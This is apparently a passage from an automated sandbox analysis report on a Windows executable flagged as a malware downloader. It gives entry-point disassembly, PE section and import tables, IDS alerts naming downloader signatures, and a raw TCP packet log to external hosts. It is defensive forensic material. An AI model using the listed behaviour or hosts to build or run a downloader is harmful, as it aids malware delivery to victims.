                                                                            cmp ax, 00000006h
                                                                            je 00007F6128E8C033h
                                                                            push ebx
                                                                            call 00007F6128E8EFA1h
                                                                            cmp eax, ebx
                                                                            je 00007F6128E8C029h
                                                                            push 00000C00h
                                                                            call eax
                                                                            mov esi, 00407298h
                                                                            push esi
                                                                            call 00007F6128E8EF1Dh
                                                                            push esi
                                                                            call dword ptr [004070A0h]
                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                            cmp byte ptr [esi], bl
                                                                            jne 00007F6128E8C00Dh
                                                                            push ebp
                                                                            push 00000009h
                                                                            call 00007F6128E8EF74h
                                                                            push 00000007h
                                                                            call 00007F6128E8EF6Dh
                                                                            mov dword ptr [0042E404h], eax
                                                                            call dword ptr [00407044h]
                                                                            push ebx
                                                                            call dword ptr [00407288h]
                                                                            mov dword ptr [0042E4B8h], eax
                                                                            push ebx
                                                                            lea eax, dword ptr [esp+38h]
                                                                            push 00000160h
                                                                            push eax
                                                                            push ebx
                                                                            push 00428828h
                                                                            call dword ptr [00407174h]
                                                                            push 00409188h
                                                                            push 0042DC00h
                                                                            call 00007F6128E8EB97h
                                                                            call dword ptr [0040709Ch]
                                                                            mov ebp, 00434000h
                                                                            push eax
                                                                            push ebp
                                                                            call 00007F6128E8EB85h
                                                                            push ebx
                                                                            call dword ptr [00407154h]
                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x1aa58.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .ndata0x2f0000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x420000x1aa580x1ac00098718c0c5bf54afe6e125c2f1ac35baFalse0.23448452102803738data3.706045365348602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_BITMAP0x424600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                            RT_ICON0x427c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.09021944871643203
                                                                            RT_ICON0x52ff00x32f2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9443336911516639
                                                                            RT_ICON0x562e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.16089211618257263
                                                                            RT_ICON0x588900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.18738273921200752
                                                                            RT_ICON0x599380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.31050106609808104
                                                                            RT_ICON0x5a7e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.440884476534296
                                                                            RT_ICON0x5b0880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5635838150289018
                                                                            RT_ICON0x5b5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.2703900709219858
                                                                            RT_ICON0x5ba580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.21908602150537634
                                                                            RT_ICON0x5bd400x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.3716216216216216
                                                                            RT_DIALOG0x5be680x144dataEnglishUnited States0.5216049382716049
                                                                            RT_DIALOG0x5bfb00x13cdataEnglishUnited States0.5506329113924051
                                                                            RT_DIALOG0x5c0f00x100dataEnglishUnited States0.5234375
                                                                            RT_DIALOG0x5c1f00x11cdataEnglishUnited States0.6056338028169014
                                                                            RT_DIALOG0x5c3100xc4dataEnglishUnited States0.5918367346938775
                                                                            RT_DIALOG0x5c3d80x60dataEnglishUnited States0.7291666666666666
                                                                            RT_GROUP_ICON0x5c4380x92dataEnglishUnited States0.6575342465753424
                                                                            RT_VERSION0x5c4d00x248dataEnglishUnited States0.5308219178082192
                                                                            RT_MANIFEST0x5c7180x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                            DLLImport
                                                                            KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                            USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                            ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-21T11:04:03.422209+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.462508142.250.185.206443TCP
                                                                            2024-10-21T11:04:09.084667+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.462510158.101.44.24280TCP
                                                                            2024-10-21T11:04:10.365945+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.462510158.101.44.24280TCP
                                                                            2024-10-21T11:04:11.057764+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.462512188.114.97.3443TCP
                                                                            2024-10-21T11:04:11.756572+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.462513158.101.44.24280TCP
                                                                            2024-10-21T11:04:13.894461+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.462516188.114.97.3443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 21, 2024 11:04:02.068619013 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:02.068692923 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:02.068866014 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:02.080171108 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:02.080209017 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:02.959755898 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:02.959829092 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:02.960834980 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:02.960891962 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.034306049 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.034344912 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:03.035274029 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:03.035332918 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.039933920 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.087429047 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:03.422235012 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:03.422374964 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.425033092 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.425122023 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:03.425491095 CEST44362508142.250.185.206192.168.2.4
                                                                            Oct 21, 2024 11:04:03.425532103 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.426064968 CEST62508443192.168.2.4142.250.185.206
                                                                            Oct 21, 2024 11:04:03.641129971 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:03.641164064 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:03.641379118 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:03.645020962 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:03.645037889 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:04.709604025 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:04.709703922 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:04.713897943 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:04.713905096 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:04.714293957 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:04.714340925 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:04.714699984 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:04.759399891 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.374824047 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.375073910 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.383337021 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.383394003 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.492901087 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.493091106 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.493102074 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.493149042 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.497586966 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.497736931 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.497781038 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.497787952 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.497827053 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.502320051 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.505176067 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.505181074 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.505249023 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.508616924 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.508671999 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.508744955 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.508789062 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.517555952 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.521048069 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.521053076 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.521208048 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.526412010 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.526531935 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.526582003 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.526587963 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.526633024 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.550595999 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.550796032 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.550888062 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.550888062 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.550895929 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.551110029 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.555538893 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.555594921 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.555598974 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.555644035 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.555648088 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.555697918 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.611551046 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.611709118 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.611762047 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.611912012 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.611912012 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.611915112 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.611923933 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.611969948 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.612052917 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.612099886 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.612312078 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.612359047 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.612364054 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.612410069 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.613898993 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.614124060 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.614152908 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.614187956 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.614196062 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.614221096 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.614236116 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.618377924 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.619807005 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.619873047 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.619878054 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.619919062 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.619923115 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.619962931 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.627187014 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.627230883 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.627280951 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.627285957 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.627326012 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.632013083 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.632179022 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.632184029 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.632230997 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.637671947 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.637720108 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.637725115 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.637773991 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.643467903 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.643517017 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.643574953 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.643618107 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.649137974 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.649188995 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.649223089 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.649265051 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.655023098 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.655071020 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.655088902 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.655129910 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.660588026 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.660634041 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.660674095 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.660717010 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.666490078 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.666537046 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.666608095 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.666652918 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.672338963 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.672390938 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.672444105 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.672487974 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.677772045 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.677815914 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.677862883 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.677908897 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.683566093 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.683615923 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.683625937 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.683670044 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.689203024 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.689261913 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.689269066 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.689317942 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.730624914 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.730685949 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.730688095 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.730698109 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.730735064 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.730822086 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.730866909 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.731004000 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.731050968 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.731375933 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.731422901 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.731568098 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.731611013 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.731611013 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.731617928 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.731662035 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.731900930 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.731949091 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.732156038 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.732198000 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.732198954 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.732204914 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.732244015 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.732250929 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.732302904 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.733800888 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.733845949 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.733891964 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.733938932 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.873346090 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.873399019 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.873406887 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.873450041 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.874248981 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.874294043 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.874366045 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.874409914 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.874414921 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.874463081 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.874587059 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.874631882 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.874810934 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.874851942 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.874856949 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.874900103 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875044107 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875089884 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875216961 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875262976 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875400066 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875447989 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875452995 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875497103 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875641108 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875679970 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875682116 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875688076 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.875725985 CEST62509443192.168.2.4216.58.206.33
                                                                            Oct 21, 2024 11:04:07.875998020 CEST44362509216.58.206.33192.168.2.4
                                                                            Oct 21, 2024 11:04:07.876048088 CEST62509443192.168.2.4216.58.206.33
